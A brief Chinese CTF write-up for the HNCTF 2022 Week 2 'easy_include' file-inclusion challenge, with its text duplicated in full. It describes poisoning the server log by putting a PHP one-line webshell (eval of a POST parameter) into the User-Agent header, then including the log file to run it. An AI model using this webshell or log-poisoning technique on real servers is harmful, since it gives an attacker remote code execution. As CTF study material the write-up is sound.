[HNCTF 2022 WEEK2]easy_include
看题图也发现在是个文件包含进来看了一下 发现过滤了很多字符
然后想的是能不在在ua里面传一句话木马并访问日志文件来触发他
然后直接查看就好了 查看日志文件的时候可能要等一下 然后也可以直接 一句话木马来查看一样 <?php eval($_POST['ACE']); ?>
看题图也发现在是个文件包含进来看了一下 发现过滤了很多字符
然后想的是能不在在ua里面传一句话木马并访问日志文件来触发他
然后直接查看就好了 查看日志文件的时候可能要等一下 然后也可以直接 一句话木马来查看一样 <?php eval($_POST['ACE']); ?>